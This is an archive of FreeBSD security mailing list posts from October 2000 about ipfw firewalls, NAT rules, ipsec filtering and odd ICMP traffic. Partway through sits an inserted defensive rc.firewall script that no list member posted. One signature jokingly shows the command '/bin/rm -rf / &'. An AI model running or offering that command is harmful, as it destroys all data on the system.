From owner-freebsd-security Sun Oct 22 17:25:09 2000
From: "tjk@tksoft.com"
Date: Sat, 21 Oct 2000 02:06:34 -0700 (PDT)
To: mlnn4@oaks.com.au
Cc: freebsd-security@FreeBSD.org
Subject: Re: Unexpected ICMP messages - is someone spoofing my subnet?
Message-Id: <200010210906.CAA08156@uno.tksoft.com>
In-Reply-To: <007701c03b26$10c42560$023a1dac@dsat.net.au> from "Chris" at Oct 21, 2000 05:13:40 PM

Chris,

Contact the admins of the hosts where the packets are coming from. Then
determine what kind of queries the host unreachables are generated for.
That's your best bet for finding out the facts.

Troy

> Recently I have noticed a lot of attention being paid (attempted TCP
> connections at port 137) to a particular IP address inside my class C
> subnet. This was over and above the normal subnet scans I get to the
> entire range.
>
> I have had this subnet for about four years and have never at any time
> had anything at that IP address.
>
> So, I modified my ipfw setup to log any IP data that come in for any
> unused address (in the past I tended to ignore ICMP at those addresses
> without logging). What I have seen surprises and to an extent perplexes
> me, so I'm writing to see if there is a rational explanation for it.
>
> Basically, I am getting perhaps 50 or 100 ICMP messages per day for a
> number (more than 30) of IP addresses that have never at any time been
> used by me. I am not referring to echo requests - those I could
> understand. These messages are typically either 'destination unreachable'
> or occasionally 'time exceeded' (almost always the former).
>
> The senders vary widely but tend to come in groups; that is, I'll get
> a batch of ICMP messages from a single host (or two closely related
> hosts) that are sent to a number of different IP addresses within my
> net, usually within a short time span.
>
> I have verified that nothing is going out of my network using those IP
> addresses.
>
> Given that 'host unreachable' messages imply that the remote system in
> question has received a packet from one of my IP addresses, which it
> rejected and then attempted to tell me about, it would seem that either
> someone is spoofing my subnet, or someone is using my subnet internally
> even though it's not assigned to them.
>
> In that case, I'd expect to see OTHER data coming in to it - but to a
> great extent I don't (apart from the normal probes that we all seem to
> get from script kiddiez). Additionally, I don't see what benefit that
> someone would gain from spoofing my subnet unless they had the ability
> to grab the data being routed back or they're performing DOS attacks.
> In the former case I would not expect to receive any ICMP at all, and
> in the latter, I'd expect to see a lot more data than what I have seen.
>
> Has anyone got any particular suggestions as to either the cause of this,
> and/or as to how I may get to the bottom of it ?
>
> regards,
>
> -- Chris

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Oct 23 08:56:36 2000
From: "third try"
Date: Mon, 23 Oct 2000 08:57:30
To: freebsd-security@freebsd.org
Subject: Hey, check out this band!
Message-Id: <20001023155633.23F6B37B4CF@hub.freebsd.org>

Hi, we are third try. I guess you could call us pop-punk. Anyways, we are
writing you because we heard that you like bands like us, and we wanted
you to visit our website: http://www.thirdtry.com. On thirdtry.com you can
find FREE MP3s of our music, so you can see for yourself how great we
really are. Thank you for your time.

Sincerely Yours,
third try

PS: Also, while you are there, check out how you can help us win the
Ernie Ball battle of the bands and win a cool purple glitter guitar!
From owner-freebsd-security Mon Oct 23 14:03:25 2000
From: Félix-Antoine Paradis
Date: Mon, 23 Oct 2000 17:03:50 -0400
To: freebsd-security@freebsd.org
Subject: test
Message-Id: <5.0.0.25.0.20001023170234.009ea0d0@pop6.sympatico.ca>

test? NO TEST. The mailing list is working fine. When you send a message,
it's *NOT* sent back to you.

Thanks...

(and that was not a rude message.)

Félix-Antoine Paradis
----------------------------------------------------------------
Idem Private Network, Administrator.
Ozyx Technologies, COO.
---------------------------------------------------------------
Also known as reel on the DALnet IRC Network. (irc.dal.net)
---------------------------------------------------------------

From owner-freebsd-security Mon Oct 23 14:07:04 2000
From: Félix-Antoine Paradis
Date: Mon, 23 Oct 2000 17:07:27 -0400
To: freebsd-security@freebsd.org
Subject: Re: test
Message-Id: <5.0.0.25.0.20001023170601.009f1df0@pop6.sympatico.ca>
In-Reply-To: <5.0.0.25.0.20001023170234.009ea0d0@pop6.sympatico.ca>

well, it is ;>~ sorry (dalnet's don't)

However, stop testing, it's just a bunch of unnecessary messages. (like
this one)

Félix-Antoine Paradis
----------------------------------------------------------------
Idem Private Network, Administrator.
Ozyx Technologies, COO.
---------------------------------------------------------------
Also known as reel on the DALnet IRC Network. (irc.dal.net)
---------------------------------------------------------------
In God we Trust -- all others must submit an X.509 certificate.

From owner-freebsd-security Tue Oct 24 14:07:21 2000
From: "Peter Brezny"
Date: Tue, 24 Oct 2000 17:07:24 -0400
To: freebsd-security@freebsd.org
Subject: request for example rc.firewall script
Message-ID: <003401c03dfe$68b42d80$47010a0a@fire.sysadmininc.com>

I'm working on adding the rules needed to rc.firewall under the 'simple'
sections to allow the script to function as a firewall/nat router for a
small network with private ip's in the 10.x.x.x range.

The firewall works if I use a simplified script, but the standard
rc.firewall that comes with 4.1 doesn't appear to allow nat to work without
modifying the rc.firewall script more than just putting in your network
info.

I think I need some allow rules before the

# Stop RFC1918 nets on the outside inteface

section of the script.

If anyone would be willing to share a portion of their rc.firewall script
I'd really appreciate it.

Peter Brezny
SysAdmin Services, Inc.

From owner-freebsd-security Tue Oct 24 14:11:09 2000
From: "Zaitsau, Andrei"
Date: Tue, 24 Oct 2000 16:10:46 -0500
To: "'peter@sysadmin-inc.com'"
Cc: "'freebsd-security@freebsd.org'"
Subject: RE: request for example rc.firewall script
Message-ID: <054F7DAA9E54D311AD090008C74CE9BD01766CC7@exchange.panasonicfa.com>

I have exactly the same problem with rc.firewall, it's blocking me from
using NAT.

Peter, if someone is going to send you rc.firewall script, can you also
forward it to me? ;)

Thanks.
Andrei.
From owner-freebsd-security Tue Oct 24 15:39:12 2000
From: Andrew Johns
Organization: KPI Logistics
Date: Wed, 25 Oct 2000 09:45:35 +1100
To: peter@sysadmin-inc.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: request for example rc.firewall script
Message-ID: <39F6110F.E8B461CA@kpi.com.au>
References: <003401c03dfe$68b42d80$47010a0a@fire.sysadmininc.com>

Peter Brezny wrote:
> I'm working on adding the rules needed to rc.firewall under the 'simple'
> sections to allow the script to function as a firewall/nat router for a
> small network with private ip's in the 10.x.x.x range.
>
> The firewall works if i use a simplified script, but the standard
> rc.firewall that comes with 4.1 doesn't appear to allow nat to work without
> modifying the rc.firewall script more than just putting in your network
> info.

Correct.

> i think i need some allow rules before the
>
> # Stop RFC1918 nets on the outside inteface
>
> section of the script.

Absolutely, or else after the divert rule, the packet is (optionally)
re-injected back into the ruleset at the next rule, where it eventually
hits the RFC1918 denies and gets dropped.

Several methods are available:

a) Move the RFC1918 denies in front of the divert rule, which is what you
   generally want anyway - stopping idiots upstream from you sending
   packets with those addresses from misconfigured machines.

b) Forget the RFC1918 denies and only allow specific target IP/ports
   through and explicitly deny everything else.

These are just two ideas. tcpdump is most useful in diagnosing these
issues, as you'll see the SRC and DST IP/port packets and you can watch
the deny logs on the console (or wherever you're sending them) - this
assumes that you've got 'deny log' rules of course.

HTH
AJ

From owner-freebsd-security Tue Oct 24 17:26:19 2000
From: "Renaud Waldura"
Date: Tue, 24 Oct 2000 17:26:10 -0700
Subject: Re: request for example rc.firewall script
Message-ID: <022201c03e1a$2cc73b20$0402010a@biohz.net>
References: <003401c03dfe$68b42d80$47010a0a@fire.sysadmininc.com>

Check these out:

http://renaud.waldura.com/doc/freebsd-firewall/
http://renaud.waldura.com/sw/freebsd-firewall/
From owner-freebsd-security Tue Oct 24 18:14:58 2000
From: "Jonathan Slivko"
Date: Tue, 24 Oct 2000 18:24:25 -0700
To: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Is this a dead list?
Message-Id: <200010241824.AA32899556@tfpmail.com>

Is this a dead list, or am I just missing posts? -- Jonathan M. Slivko.

--
----
Jonathan M. Slivko
Systems Administrator, CoreSync Corporation
Technical Support, Simple Hosting Solutions
Voicemail/Pager: (888) 365-0000 x72601
----
--

From owner-freebsd-security Tue Oct 24 18:46:23 2000
From: "Forrest W. Christian"
Date: Tue, 24 Oct 2000 18:49:17 -0600 (MDT)
To: Jonathan Slivko
Cc: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Is this a dead list?
In-Reply-To: <200010241824.AA32899556@tfpmail.com>

freebsd-isp (at least) is alive and well....

On Tue, 24 Oct 2000, Jonathan Slivko wrote:
> Is this a dead list, or am I just missing posts? -- Jonathan M. Slivko.

- Forrest W. Christian (forrestc@imach.com) AC7DE
----------------------------------------------------------------------
iMach, Ltd., P.O. Box 5749, Helena, MT 59604      http://www.imach.com
Solutions for your high-tech problems.                  (406)-442-6648
----------------------------------------------------------------------

From owner-freebsd-security Tue Oct 24 20:49:36 2000
From: "Mike Hoskins"
Date: Tue, 24 Oct 2000 20:49:12 -0700 (PDT)
To: Andrew Johns, peter@sysadmin-inc.com, freebsd-security@FreeBSD.ORG
Subject: Re: request for example rc.firewall script
Message-Id: <20001025034912.7190E9EE01@snafu.adept.org>

> b) Forget the RFC1918 denies and only allow specific target IP/ports
> through and explicitly deny everything else.

My personal favorite, I.e.:

check-state
allow ip from a.b.c.d to any keep-state
allow ip from x.y.z.z/24 to any keep-state
allow tcp from NS1 to a.b.c.d 53 setup
allow udp from NS1 to a.b.c.d 53
allow udp from a.b.c.d 53 to any
allow tcp from any to a.b.c.d 25 setup
allow tcp from any to a.b.c.d 22 in keep-state lifetime 3600
allow tcp from any to a.b.c.d 80 setup
allow tcp from any to a.b.c.d 443 setup
allow tcp from NTP to a.b.c.d 123 setup
allow udp from NTP to a.b.c.d 123

Note: a.b.c.d == outside IP
      x.y.z.z == internal network
      NS1     == primary nameserver's IP
      NTP     == NTP server's IP

This builds dynamic rules for internal hosts and allows access to tcp/udp
53 from our upstream nameserver, DNS queries to the world, SMTP, SSH
(setting timeout to 1 hour vs. default sysctl values thanks to Aaron
Gifford's patches), HTTP, SSL, and NTP.
This is certainly more of a custom firewall chain than a slight
modification to rc.firewall's 'simple' configuration, but I'm usually
anal enough I wouldn't feel comfortable any other way. ;) Also remember
that this is just a quick example... read the man page for a more
detailed understanding.

-mrh

From owner-freebsd-security Tue Oct 24 21:38:57 2000
From: Michael Maxwell
Date: Tue, 24 Oct 2000 23:38:52 -0500
To: freebsd-security@freebsd.org
Subject: Empty mails from root
Message-ID: <20001024233851.A2618@sun.segfault.lan>

Hi,

I've noticed that since I upgraded from 3.5-STABLE to 4.1.1-STABLE a
couple days ago, I have been receiving, along with the normal
security-check mails and system info mails, a blank message from root.
There is no subject line, no contents, etc... but it originates on the
local host.

Could someone please tell me what this is for and if it's normal? Or
is this indicative of something else...?

Thanks.

--
Michael Maxwell    | Unix Specialist - Solaris/BSD/SCO
drwho @ xnet . com | "I'm not wearing any pants..." Film at eleven.
[1] + 5934 done    /bin/rm -rf / &

From owner-freebsd-security Tue Oct 24 21:44:06 2000
From: Mike Silbersack
Date: Tue, 24 Oct 2000 23:43:59 -0500 (CDT)
To: Michael Maxwell
Cc: freebsd-security@freebsd.org
Subject: Re: Empty mails from root
In-Reply-To: <20001024233851.A2618@sun.segfault.lan>

On Tue, 24 Oct 2000, Michael Maxwell wrote:
> Could someone please tell me what this is for and if it's normal? Or
> is this indicative of something else...?

Did you mergemaster? The security run-related files changed a lot.

Mike "Silby" Silbersack

From owner-freebsd-security Tue Oct 24 22:43:36 2000
From: "Crist J . Clark"
Reply-To: cjclark@alum.mit.edu
Date: Tue, 24 Oct 2000 22:43:13 -0700
To: Mike Hoskins
Cc: Andrew Johns, peter@sysadmin-inc.com, freebsd-security@FreeBSD.ORG
Subject: Re: request for example rc.firewall script
Message-ID: <20001024224313.X75251@149.211.6.64.reflexcom.com>
In-Reply-To: <20001025034912.7190E9EE01@snafu.adept.org>

On Tue, Oct 24, 2000 at 08:49:12PM -0700, Mike Hoskins wrote:
> > b) Forget the RFC1918 denies and only allow specific target IP/ports
> > through and explicitly deny everything else.
>
> My personal favorite, I.e.:
>
> check-state
> allow ip from a.b.c.d to any keep-state
> allow ip from x.y.z.z/24 to any keep-state

Eep! You've left yourself _very_ vulnerable to spoofing.
--
Crist J. Clark                           cjclark@alum.mit.edu

From owner-freebsd-security Wed Oct 25 01:38:41 2000
From: Mike Hoskins
Date: Wed, 25 Oct 2000 01:38:19 -0700 (PDT)
To: cjclark@alum.mit.edu
Cc: Andrew Johns, peter@sysadmin-inc.com, freebsd-security@FreeBSD.ORG
Subject: Re: request for example rc.firewall script
In-Reply-To: <20001024224313.X75251@149.211.6.64.reflexcom.com>

On Tue, 24 Oct 2000, Crist J . Clark wrote:
> > check-state
> > allow ip from a.b.c.d to any keep-state
> > allow ip from x.y.z.z/24 to any keep-state
> Eep! You've left yourself _very_ vulnerable to spoofing.

From the internal net you mean? If so, I agree. Given I'm the only
person using my 'LAN', I've accepted that as a liveable risk. ;) Also,
outbound ACL's on my router prevent spoofing without ipfw's intervention
in my case... I do, however, agree that an additional 'layer' of
security could and should be bought if this were a production
firewall/router.
-mrh

From owner-freebsd-security Wed Oct 25 05:43:03 2000
From: Jim Weeks
Date: Wed, 25 Oct 2000 08:42:52 -0400 (EDT)
To: Jonathan Slivko
Cc: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Is this a dead list?
In-Reply-To: <200010241824.AA32899556@tfpmail.com>

On Tue, 24 Oct 2000, Jonathan Slivko wrote:
> Is this a dead list, or am I just missing posts? -- Jonathan M. Slivko.

Strange you should ask this. I have noticed RE: posts lately without ever
seeing the original post. I thought it might be something on my end but
have been unable to find a problem. My mail server has been up
continually since the last make world. I don't seem to be losing other
mail. Am I the only one that has noticed this?

--
Jim Weeks

From owner-freebsd-security Wed Oct 25 08:32:42 2000
From: Andrey Rouskol
Date: Wed, 25 Oct 2000 19:32:58 +0400 (MSD)
To: freebsd-security@freebsd.org
Subject: ipsec and ipfw

Hi !

I've found that in -current outgoing ipsec-packets (esp, ah) pass without
being filtered by ipfw and incoming deencapsulated traffic is not filtered
by ipfw too. So telnet connection over ipsec with stateful filtering is
dropped in 20 seconds (which is dyn_syn_lifetime). All tests were made in
'transport' mode. Is this normal ?

Regards,
Andrey.
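Added example for the rc.firewall thread above, not a script posted by anyone on the list: an rc.firewall-style ipfw rule set for Peter's 10.x NAT router that takes Andrew Johns' option (a), the RFC1918 denies ahead of the divert rule, qualifies those denies by direction so that still-untranslated outbound packets reach natd (a detail the thread leaves implicit), and binds every rule to an interface so the spoofing weakness Crist Clark raised about unqualified keep-state rules does not arise. Interface names and addresses are assumed placeholders; with APPLY unset the script only prints the rules and checks their order.

```shell
#!/bin/sh
# Added example (not a participant's script): rc.firewall-style ipfw rules
# for a NAT router with a private 10.x network.  The RFC1918 denies are
# placed BEFORE the divert rule, so a packet natd has already rewritten to
# a private inside address is not re-injected straight into a deny, and
# they are qualified by direction so that untranslated outbound packets
# from 10.x still reach natd.  Interface names and addresses are assumed
# placeholders; adjust them for your network.
oif="fxp0"          # assumed outside interface
oip="192.0.2.10"    # assumed outside address (documentation range)
iif="fxp1"          # assumed inside interface
inet="10.0.0.0/24"  # assumed inside network
fwcmd="/sbin/ipfw"

# Emit one rule.  With APPLY=yes it is loaded into the kernel; otherwise
# the command is printed so the ordering can be reviewed (or checked by
# rules_ordered below) on a host without ipfw.
rule() {
    if [ "${APPLY:-no}" = "yes" ]; then
        $fwcmd -q add "$@"
    else
        echo "$fwcmd add $*"
    fi
}

build_rules() {
    # Loopback, as in the stock script.
    rule 100 allow ip from any to any via lo0
    rule 200 deny ip from any to 127.0.0.0/8
    rule 300 deny ip from 127.0.0.0/8 to any

    # Anti-spoofing on both interfaces, before anything is translated:
    # our inside net never arrives from outside, and nothing but our
    # inside net arrives from inside.
    rule 400 deny log ip from $inet to any in via $oif
    rule 410 deny log ip from not $inet to any in via $iif

    # RFC1918 nets on the outside interface.  "in" for sources and "out"
    # for destinations only: an outbound packet from 10.x still carries
    # its private source at this point and must get to the divert rule.
    for net in 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16; do
        rule 500 deny log ip from $net to any in via $oif
        rule 510 deny log ip from any to $net out via $oif
    done

    # NAT.  natd rewrites outbound sources to $oip and inbound reply
    # destinations back to the inside host; the packet then continues at
    # the next rule, already past the denies above.
    rule 600 divert natd ip from any to any via $oif

    # After translation nothing private may leave $oif.  If it does,
    # natd is not translating, and we drop it rather than leak 10.x.
    rule 610 deny log ip from 10.0.0.0/8 to any out via $oif

    # Stateless service rules in the style of the 'simple' section.
    rule 700 allow tcp from any to any established
    rule 710 allow tcp from $inet to any setup in via $iif
    rule 720 allow tcp from $oip to any setup out via $oif
    rule 730 allow udp from $inet to any 53 in via $iif
    rule 740 allow udp from $oip to any 53 out via $oif
    rule 750 allow udp from any 53 to $oip in via $oif
    rule 760 allow udp from any 53 to $inet in via $oif
    rule 770 allow ip from any to $inet out via $iif
    rule 780 allow icmp from any to any icmptypes 0,3,8,11

    # Everything else is logged and dropped.
    rule 65000 deny log ip from any to any
}

# Ordering check: all three RFC1918 source denies on $oif must precede
# the divert rule.  Returns 0 when the order is right.
rules_ordered() {
    build_rules | awk -v oif="$oif" '
        /divert natd/ { divert = NR }
        $0 ~ "from (10\\.0\\.0\\.0/8|172\\.16\\.0\\.0/12|192\\.168\\.0\\.0/16) to any in via " oif {
            if (divert) late++; else early++
        }
        END { if (early == 3 && late == 0) exit 0; exit 1 }'
}

rules_ordered || { echo "RFC1918 denies must precede the divert rule" >&2; exit 1; }
build_rules
```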
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 25 9:41:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 0D32937B479 for ; Wed, 25 Oct 2000 09:41:32 -0700 (PDT) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id e9PGgVL51266; Wed, 25 Oct 2000 09:42:31 -0700 (PDT) (envelope-from kris) Date: Wed, 25 Oct 2000 09:42:31 -0700 From: Kris Kennaway To: Andrey Rouskol Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipsec and ipfw Message-ID: <20001025094231.A51227@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from anry@sovintel.ru on Wed, Oct 25, 2000 at 07:32:58PM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 25, 2000 at 07:32:58PM +0400, Andrey Rouskol wrote: > I've found that in -current outgoing ipsec-packets (esp, ah) pass > without been filtered by ipfw and incoming deencapsulated traffic is not > filtered by ipfw too. So telnet connection over ipsec with statefull > filtering is dropped in 20 seconds (which is dyn_syn_lifetime). All tests > was made in 'transport' mode. Is this normal ? Please show us your ipsec configuration and ipfw rules. 
Kris

From owner-freebsd-security Wed Oct 25 9:57:23 2000
Delivered-To: freebsd-security@freebsd.org
Received: from obelix.rby.hk-r.se (obelix-b.rby.hk-r.se [194.47.132.4]) by hub.freebsd.org (Postfix) with ESMTP id 115B537B479 for ; Wed, 25 Oct 2000 09:57:19 -0700 (PDT)
Received: from orc.rby.hk-r.se (orc [194.47.134.179]) by obelix.rby.hk-r.se (8.10.2/8.10.2) with ESMTP id e9PGvgK08368 for ; Wed, 25 Oct 2000 18:57:42 +0200 (MEST)
Received: from localhost (t98pth@localhost) by orc.rby.hk-r.se (8.10.2/8.10.2) with ESMTP id e9PGvGM20197 for ; Wed, 25 Oct 2000 18:57:16 +0200 (MET DST)
Date: Wed, 25 Oct 2000 18:57:16 +0200 (MET DST)
From: Pär Thoren
To: freebsd-security@freebsd.org
Subject: Firewall
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi!

I want to protect a network with a firewall. The network is xx.xx.xx.0 and has a gateway at xx.xx.xx.1; dns servers are xx.xx.xx.2 and xx.xx.xx.3.

How can I protect the network with a fbsd firewall? Do I use bridge/firewall or do I set fbsd as a router/firewall "behind" the gateway xx.xx.xx.1 ?

    Big Bad Internet
           |
        ___|__
       |      |
       |  gw  |
       |______|
           |
        ___|__
       |      |   Acting as bridge? router?
       | fbsd |   with ipfw
       |______|
           |
      _____|_____
     |           |   Network including the dns servers
     |  .2-.255  |
     |___________|

From owner-freebsd-security Wed Oct 25 11: 7:17 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ns.sovintel.ru (ns.sovintel.ru [212.44.130.6]) by hub.freebsd.org (Postfix) with ESMTP id 2B5A037B479 for ; Wed, 25 Oct 2000 11:07:12 -0700 (PDT)
Received: from anry (fw-nat.sovintel.net [212.44.130.15]) by ns.sovintel.ru (8.9.3/8.9.3) with ESMTP id WAA19018; Wed, 25 Oct 2000 22:05:50 +0400 (MSD)
Date: Wed, 25 Oct 2000 22:06:16 +0400 (MSD)
From: Andrey Rouskol
To: Kris Kennaway
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ipsec and ipfw
In-Reply-To: <20001025094231.A51227@citusc17.usc.edu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 25 Oct 2000, Kris Kennaway wrote:

> On Wed, Oct 25, 2000 at 07:32:58PM +0400, Andrey Rouskol wrote:
>
> > I've found that in -current outgoing ipsec-packets (esp, ah) pass
> > without been filtered by ipfw and incoming deencapsulated traffic is not
> > filtered by ipfw too. So telnet connection over ipsec with statefull
> > filtering is dropped in 20 seconds (which is dyn_syn_lifetime). All tests
> > was made in 'transport' mode. Is this normal ?
>
> Please show us your ipsec configuration and ipfw rules.

Configs below. Rule 261 has counters from test time - it is not updated during ping.
# ping 10.1.1.225
PING 10.1.1.225 (10.1.1.225): 56 data bytes
64 bytes from 10.1.1.225: icmp_seq=0 ttl=253 time=4.837 ms
64 bytes from 10.1.1.225: icmp_seq=1 ttl=253 time=4.482 ms
64 bytes from 10.1.1.225: icmp_seq=2 ttl=253 time=4.454 ms
^C
--- 10.1.1.225 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max/stddev = 4.454/4.591/4.837/0.174 ms

ipfw show:
00100 31184 24875678 allow ip from any to any via lo0
00100 0 0 allow ip from any to any via lo0
00200 0 0 deny ip from any to 127.0.0.0/8
00200 0 0 deny ip from any to 127.0.0.0/8
00250 0 0 allow log esp from any to 10.1.1.225 out
00251 4643 523472 allow log esp from 10.1.1.225 to any in
00252 0 0 allow ah from any to 10.1.1.225
00253 583 63244 allow ah from 10.1.1.225 to any
00260 3 252 allow log ip from any to 10.1.1.225 out
00261 10 1480 deny log ip from 10.1.1.225 to any in
00300 0 0 check-state
00350 28590 1433158 deny log tcp from any to any established
00800 375543 233329232 allow tcp from any to any keep-state out
00900 10345 968766 allow tcp from any to any 23,21 keep-state in
01000 5077 1427628 allow tcp from any to any 6000 keep-state in
01100 1917883 161015900 allow icmp from any to any
09000 6049 871798 allow udp from any to any 53 keep-state out
09100 0 0 allow log udp from any to any 69 in
09200 48 2682 allow log udp from any to any keep-state out
10000 101386 11335729 deny udp from any to any
10100 10 680 deny log ip from any to any
65535 0 0 deny ip from any to any
## Dynamic rules:
....
---------
setkey -c input:
flush ;
spdflush ;
add 10.2.1.239 10.1.1.225 esp 0x10001 -E des-cbc "ESP with" -A hmac-md5 "authentication!!" ;
add 10.1.1.225 10.2.1.239 esp 0x10002 -E des-cbc "ESP with" -A hmac-md5 "authentication!!" ;
spdadd 10.2.1.239/32 10.1.1.225/32 any -P out ipsec esp/transport/10.2.1.239-10.1.1.225/require ;
spdadd 10.1.1.225/32 10.2.1.239/32 any -P in ipsec esp/transport/10.1.1.225-10.2.1.239/require ;
-------
dmesg output:
ipfw: 251 Accept P:50 10.1.1.225 10.2.1.239 in via fxp0
ipfw: 251 Accept P:50 10.1.1.225 10.2.1.239 in via fxp0
ipfw: 260 Accept ICMP:8.0 10.2.1.239 10.1.1.225 out via fxp0
ipfw: 251 Accept P:50 10.1.1.225 10.2.1.239 in via fxp0
ipfw: 260 Accept ICMP:8.0 10.2.1.239 10.1.1.225 out via fxp0
ipfw: 251 Accept P:50 10.1.1.225 10.2.1.239 in via fxp0
ipfw: 260 Accept ICMP:8.0 10.2.1.239 10.1.1.225 out via fxp0
ipfw: 251 Accept P:50 10.1.1.225 10.2.1.239 in via fxp0

>
> Kris
>

Regards, Andrey.

From owner-freebsd-security Wed Oct 25 11:37:39 2000
Delivered-To: freebsd-security@freebsd.org
Received: from maile.telia.com (maile.telia.com [194.22.190.16]) by hub.freebsd.org (Postfix) with ESMTP id 98A3E37B479 for ; Wed, 25 Oct 2000 11:37:32 -0700 (PDT)
Received: from ents02 (t1o90p104.telia.com [195.67.216.104]) by maile.telia.com (8.9.3/8.9.3) with SMTP id UAA23259; Wed, 25 Oct 2000 20:37:25 +0200 (CEST)
From: "James Wilde"
To: Pär Thoren ,
Subject: RE: Firewall
Date: Wed, 25 Oct 2000 20:37:59 +0200
Message-ID: <000601c03eb2$b2f67150$8208a8c0@iqunlimited.net>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
In-Reply-To:
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Pär Thoren
> Sent: Wednesday, October 25, 2000 18:57
> To: freebsd-security@FreeBSD.ORG
> Subject: Firewall
>
>
>
> Hi!
>
> I want to protect a network with a firewall. The network is
> xx.xx.xx.0 and has a gateway at xx.xx.xx.1
> dns servers are xx.xx.xx.2 and xx.xx.xx.3
>
> How can I protect the network with a fbsd firewall? Do I use
> bridge/firewall or do I set fbsd as a router/firewall "behind" the gateway
> xx.xx.xx.1 ?

Hi Pär:

Why would you want to expose your gateway to the BBI? In the first place it has an intimate relationship with the hosts on your network, .2-.255, so a compromised gateway is halfway to a compromised network. In the second place, in the diagram you have drawn, it is not even on the same network. Your gateway could not have the number .1 and still be accessible from the network since there is no direct route from, say, .2 to .1.

From what I have been able to learn - others may come in and correct me - your diagram could look something like this:

> Big Bad Internet
>        |
>     ___|__
>    | fbsd |
>    | fw/gw|
>    |______|
>        |
>        |
>   _____|_____
>  |           | Network including the dns servers
>  |  .2-.255  |
>  |___________|
>

An even better alternative might be:

> Big Bad Internet
>        | R---------- smtp, public DNS
>     ___|___
>    | fbsd  |
>    | fw/gw |
>    |_______|
>        |
>        |---[DMZ]------- Internet Service Lan (mail, www, etc)
>     ___|___
>    | fbsd  |
>    | fw/gw |
>    |___.1__|
>        |
>   _____|_____
>  |           | Network including the dns servers
>  |  .2-.255  |
>  |___________|
>

Some people, with tight budgets, hang the IS Lan directly off a third NIC in the outer firewall and scrap the inner firewall.

Some suggestions:

Seal your smtp/DNS servers with, say, IP-Filter configured for minimal services (25, 53, maybe 22 and ntp) and switch off pretty well all daemons.

Seal your outer firewall the same way, although you will need to let in more services, at least to the IS Lan.
Decide where your .2-.255 network will go for its external contacts, to a proxy on the inner firewall or the IS Lan or direct to the BBI, and configure the IP-Filter in the inner wall in accordance with that.

If you want me to take this in Swedish off-line, say the word.

mvh/regards
James

From owner-freebsd-security Wed Oct 25 11:42:36 2000
Delivered-To: freebsd-security@freebsd.org
Received: from maile.telia.com (maile.telia.com [194.22.190.16]) by hub.freebsd.org (Postfix) with ESMTP id 253BF37B4D7 for ; Wed, 25 Oct 2000 11:42:33 -0700 (PDT)
Received: from ents02 (t1o90p104.telia.com [195.67.216.104]) by maile.telia.com (8.9.3/8.9.3) with SMTP id UAA26367; Wed, 25 Oct 2000 20:42:31 +0200 (CEST)
From: "James Wilde"
To: Pär Thoren ,
Subject: RE: Firewall
Date: Wed, 25 Oct 2000 20:43:05 +0200
Message-ID: <000701c03eb3$6932aa10$8208a8c0@iqunlimited.net>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
In-Reply-To:
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Pär Thoren
> Sent: Wednesday, October 25, 2000 18:57
> To: freebsd-security@FreeBSD.ORG
> Subject: Firewall
>
>
>
> Hi!
>
> I want to protect a network with a firewall. The network is
> xx.xx.xx.0 and has a gateway at xx.xx.xx.1
> dns servers are xx.xx.xx.2 and xx.xx.xx.3

I should have said that I am assuming these dns servers are private, that is, purely for the use of name resolution on the internal network. Received wisdom maintains that public dns servers, along with smtp servers, should be on the outside as a result of weaknesses in the protocols. This may have changed with more modern versions of the standard daemons.

mvh/regards
James

From owner-freebsd-security Wed Oct 25 15:34: 8 2000
Delivered-To: freebsd-security@freebsd.org
Received: from icebox.venux.net (icebox.venux.net [216.120.166.10]) by hub.freebsd.org (Postfix) with ESMTP id 3B81D37B479 for ; Wed, 25 Oct 2000 15:34:06 -0700 (PDT)
